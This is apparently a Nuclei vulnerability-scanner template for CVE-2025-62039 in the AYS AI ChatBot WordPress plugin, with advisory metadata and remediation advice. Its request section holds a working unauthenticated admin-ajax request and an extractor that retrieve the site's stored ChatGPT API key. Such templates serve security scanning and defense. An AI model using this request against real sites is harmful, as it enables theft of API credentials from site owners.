AI ChatBot with ChatGPT by AYS <= 2.6.6 - Unauthenticated API Key Exposure

id: CVE-2025-62039

info:
  name: AI ChatBot with ChatGPT by AYS <= 2.6.6 - Unauthenticated API Key Exposure
  author: pussycat0x
  severity: high
  description: |
    AYS AI ChatBot with ChatGPT and Content Generator <= 2.6.6 contains an insertion of sensitive information into sent data vulnerability caused by improper handling of embedded sensitive data, letting attackers retrieve sensitive information, exploit requires crafted input.
  impact: Attackers can retrieve embedded sensitive information, potentially leading to data leakage and privacy violations.
  remediation: Update to the latest version beyond 2.6.6.
  reference:
    - https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/ays-chatgpt-assistant/ai-chatbot-with-chatgpt-and-content-generator-by-ays-266-unauthenticated-information-exposure
  metadata:
    verified: true
    max-request: 1
  tags: cve,cve2025,wordpress,wp-plugin,ays-chatgpt-assistant

http:
  - raw:
      - |
        POST /wp-admin/admin-ajax.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        action=ays_chatgpt_admin_ajax&function=get_chatgpt_api_key

    matchers:
      - type: dsl
        dsl:
          - 'contains(body, "success\":true")'
          - 'contains(body, "api_key")'
          - 'status_code == 200'
          - 'contains(content_type, "application/json")'
        condition: and

    extractors:
      - type: json
        name: api_key
        json:
          - '.data.api_key'
# digest: 490a00463044022007d06b9472c223651fcb31380c476042becbef9dccb81772b40db1773b35c6e402200ac6a0dddd497a0797b264eef40b61cf750c2e1e14e96e4d6faa076716024975:922c64590222798bb761d5b6d8e72950